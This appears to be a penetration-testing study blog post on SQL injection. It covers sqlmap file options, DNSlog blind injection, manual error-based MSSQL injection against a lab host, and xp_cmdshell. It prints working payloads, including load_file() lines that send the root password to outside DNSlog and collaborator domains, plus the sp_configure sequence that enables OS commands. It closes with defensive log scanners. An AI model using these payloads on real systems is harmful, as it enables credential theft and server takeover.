2019-10-29: penetration testing study notes: sqlmap file read/write, DNSlog-based blind injection, manual MSSQL injection

sqlmap parameters
--file-read: read a file from the database server
--file-write together with --file-dest: upload a local file to the given path on the database server

DNSlog platform and its use in blind injection
1. Find the injection point.
2. Test whether the target will resolve the DNSlog domain, e.g. for MySQL:
select load_file(concat('\\\\',(select password from mysql.user where user='root' limit 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
load_file() reads files; given a UNC path it makes the server issue a DNS request for the host name, so whatever is spliced into the name shows up in the DNSlog.
Example: select load_file(group_concat('\\\\',(select concat(user,password) from users limit 3,1),'.6rylw1tbh2htjx3hap90nqqj8ae02p.burpcollaborator.net\\aaa'));
If the page takes noticeably longer to respond, the server is attempting the resolution, which shows the request went out.
3. Use concat to splice the result of the injected SQL statement into the host name and read the data from the DNSlog.

Manual MSSQL injection
1. Locate the injection point: http://192.168.190.148/less-1.asp?id=1' returns an error about the unclosed quotation mark after the character string '1'', which indicates an injection point.
2. Determine the database type: http://192.168.190.148/less-1.asp?id=1' and exists(select * from sysobjects)-- ; if no error is returned, the back-end database is SQL Server.
Other methods exist, most commonly judging from the framework combination (asp + mssql, php + mysql) or from the error page.
3. select is_srvrolemember('sysadmin'); tells whether the current login is sa: http://192.168.190.148/less-1.asp?id=1' and (select is_srvrolemember('sysadmin'))>0-- ; the page comes back without an error, indicating the current account is sa.
select is_srvrolemember('db_owner'); tells whether the current user has the db_owner role needed to read and write files: http://192.168.190.148/less-1.asp?id=1' and (select is_srvrolemember('db_owner'))>0-- ; here the page returned nothing, indicating no read/write permission on the database.
select is_srvrolemember('public'); tells whether the login has the public role, which is enough to enumerate tables: http://192.168.190.148/less-1.asp?id=1' and (select is_srvrolemember('public'))>

4. Get database information
http://192.168.190.148/less-1.asp?id=1' and (select @@version)=1-- ; the conversion error message returns the SQL Server version.
http://192.168.190.148/less-1.asp?id=1' and (user)=1-- ; error: [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'dbo' to data type int. The current user is dbo.
http://192.168.190.148/less-1.asp?id=1' and (select db_name())=1-- ; error: [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'test' to data type int. The current database is test.
select db_name(0); the parameter starts at 0, which is the current database; changing the parameter of db_name() enumerates all databases.
http://192.168.190.148/less-1.asp?id=1' and (select top 1 name from master..sysdatabases where name not in ('aspcms','master','model'))>1--
select top 3 name from master..sysdatabases; queries all databases; add a condition like where name not in ('db_name','dbname') to skip the ones already found.

5. Get the tables of the current database
http://192.168.190.148/less-1.asp?id=1' and (select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0)>1-- ; the error returns the first table, emails.
http://192.168.190.148/less-1.asp?id=1' and (select top 1 name from test.sys.all_objects where type='U' and is_ms_shipped=0 and name not in ('emails'))>1-- ; after excluding emails the next table is returned; keep adding names to not in until all tables are known.
6. Get the columns of a given table in the current database
http://192.168.190.148/less-1.asp?id=1' and (select top 1 column_name from test.information_schema.columns where table_name='users')>1-- ; returns the first column.
http://192.168.190.148/less-1.asp?id=1' and (select top 1 column_name from test.information_schema.columns where table_name='users' and column_name not in ('id'))>1-- ; returns the first column other than id; keep adding to not in to get all column names.
http://192.168.190.148/less-1.asp?id=1' and (select top 1 name from syscolumns where id=object_id('users'))>1-- ; returns the first column.
http://192.168.190.148/less-1.asp?id=1' and (select top 1 name from syscolumns where id=object_id('users') and name not in ('id'))>1-- ; returns the first column other than id; keep adding to not in until all columns are known.
7. Get the values of a given column in a table
http://192.168.190.148/less-1.asp?id=1' and (select top 1 username from users)>1-- ; returns the data of the given column; change the column name in the injection to read the other columns.
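Added example, not part of the original notes: a Python scanner for the defender's side of both sections above, the DNSlog load_file() pattern and the manual MSSQL probes. It runs a small rule set over web-server request lines so these payloads can be spotted in access logs. The sample requests are constructed here and reuse the 192.168.190.148/less-1.asp target from the notes; oob.example is a placeholder for the DNSlog/collaborator domain, and the rule names are my own.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Constructed sample access-log request fields (METHOD URL HTTP/x). Host and page come
# from the notes above; oob.example is a placeholder for the DNSlog/collaborator domain.
SAMPLE_REQUESTS = [
    "GET /less-1.asp?id=1 HTTP/1.1",
    "GET /less-1.asp?id=1'%20and%20(select%20IS_SRVROLEMEMBER('sysadmin'))>0-- HTTP/1.1",
    "GET /less-1.asp?id=1'%20and%20(select%20@@version)=1-- HTTP/1.1",
    "GET /less-1.asp?id=1'and%20(select%20top%201%20name%20from%20master..sysdatabases"
    "%20where%20name%20not%20in%20('master'))>1-- HTTP/1.1",
    "GET /index.php?id=1%20and%20(select%20load_file(concat('%5C%5C%5C%5C',"
    "(select%20user()),'.oob.example%5C%5Cabc'))) HTTP/1.1",
]

# Each rule names the technique from the notes that it recognises in a decoded request.
RULES = [
    ("mssql_role_probe", re.compile(r"is_srvrolemember\s*\(", re.I)),
    ("mssql_version_probe", re.compile(r"@@version", re.I)),
    ("mssql_catalog_enum", re.compile(
        r"\b(sysobjects|sysdatabases|syscolumns|sys\.all_objects|information_schema\.columns)\b",
        re.I)),
    # "(select ...)" compared with an integer and closed with "--": the type-conversion
    # error trick used above to leak user, db_name, table and column names.
    ("error_based_compare", re.compile(
        r"\(\s*select\b[^()]*(?:\([^()]*\)[^()]*)*\)\s*[<>=]\s*\d+\s*--", re.I)),
    # load_file() on a UNC path (\\host\share): the MySQL DNS out-of-band pattern.
    ("mysql_oob_dns", re.compile(r"load_file\s*\(.*\\{2,}", re.I | re.S)),
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
]


def normalize(request_line: str) -> str:
    """Take the URL out of a 'METHOD URL HTTP/x' request field, URL-decode it twice
    (payloads are often double-encoded) and collapse whitespace."""
    parts = request_line.split(" ")
    url = parts[1] if len(parts) >= 2 else request_line
    decoded = unquote_plus(unquote_plus(url))
    return re.sub(r"\s+", " ", decoded)


def scan_request(request_line: str) -> list[str]:
    """Return the names of all rules that match this request, in RULES order."""
    text = normalize(request_line)
    return [name for name, rx in RULES if rx.search(text)]


def scan_log(lines) -> list[tuple[int, list[str]]]:
    """Return (line index, matched rule names) for each request that triggers a rule."""
    hits = []
    for i, line in enumerate(lines):
        names = scan_request(line)
        if names:
            hits.append((i, names))
    return hits


if __name__ == "__main__":
    for idx, names in scan_log(SAMPLE_REQUESTS):
        print(f"line {idx}: {', '.join(names)}")
```

The rules are deliberately specific to the catalog views, role checks and compare-then-comment shape used in the notes, so they produce few false positives on ordinary traffic; in practice the same scanner would be fed the request field of real access-log lines rather than the constructed list.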

MSSQL xp_cmdshell extended stored procedure
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'; checks whether the xp_cmdshell extended procedure exists.
exec master..xp_cmdshell 'whoami'; calls xp_cmdshell.
If it is disabled the call fails with: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online. To enable it, run in Query Analyzer:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
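Added example, not part of the original notes: the defender-side counterpart of the sp_configure sequence above, a Python parser over SQL Server ERRORLOG lines that flags the moment xp_cmdshell (or a comparable option) is switched on. The log lines are constructed here in ERRORLOG layout around the "Configuration option '...' changed from N to M" message SQL Server writes when sp_configure changes a setting; the two extra option names in RISKY_OPTIONS are well-known sp_configure options added by me and do not come from the notes.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample lines in SQL Server ERRORLOG layout (timestamp, source spid, message).
# The sequence mirrors the notes above: advanced options, then xp_cmdshell, enabled by spid55.
SAMPLE_ERRORLOG = """\
2019-10-29 10:14:01.55 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-10-29 10:14:01.70 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-10-29 10:20:45.01 spid61      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2019-10-29 10:31:12.08 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2019-10-29 10:31:12.09 spid55      Starting up database 'test'.
"""

LINE_RX = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<src>\S+)\s+(?P<msg>.*)$")
CHANGE_RX = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")

# sp_configure options that hand OS command execution or outbound connections to the
# database engine. xp_cmdshell is the one from the notes; the other two are well-known
# peers added here as an assumption, not taken from the page.
RISKY_OPTIONS = {"xp_cmdshell", "ole automation procedures", "ad hoc distributed queries"}


@dataclass
class ConfigChange:
    timestamp: str
    spid: str
    option: str
    old: int
    new: int


def parse_config_changes(log_text: str) -> list[ConfigChange]:
    """Pull every sp_configure change out of ERRORLOG text; unrelated lines are ignored."""
    changes = []
    for line in log_text.splitlines():
        m = LINE_RX.match(line)
        if not m:
            continue
        c = CHANGE_RX.search(m.group("msg"))
        if not c:
            continue
        changes.append(ConfigChange(m.group("ts"), m.group("src"), c.group("opt"),
                                    int(c.group("old")), int(c.group("new"))))
    return changes


def find_risky_enablements(changes: list[ConfigChange]) -> list[ConfigChange]:
    """Changes that turn a risky option from off (0) to on: the event worth alerting on."""
    return [c for c in changes
            if c.option.lower() in RISKY_OPTIONS and c.old == 0 and c.new != 0]


def final_state(changes: list[ConfigChange]) -> dict[str, int]:
    """Last known value per option, to tell a transient enable/disable from a lasting one."""
    state: dict[str, int] = {}
    for c in changes:
        state[c.option.lower()] = c.new
    return state


if __name__ == "__main__":
    found = parse_config_changes(SAMPLE_ERRORLOG)
    for c in find_risky_enablements(found):
        print(f"ALERT {c.timestamp} {c.spid}: '{c.option}' enabled ({c.old} -> {c.new})")
    print("final state:", final_state(found))
```

An alert from find_risky_enablements() that nobody in the DBA team can account for is a strong sign the sequence above was run through an injection point; the immediate fix is EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE; followed by a review of which logins hold sysadmin, since that is the role the injected session needed to change the setting.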

Origin www.cnblogs.com/sym945/p/11760806.html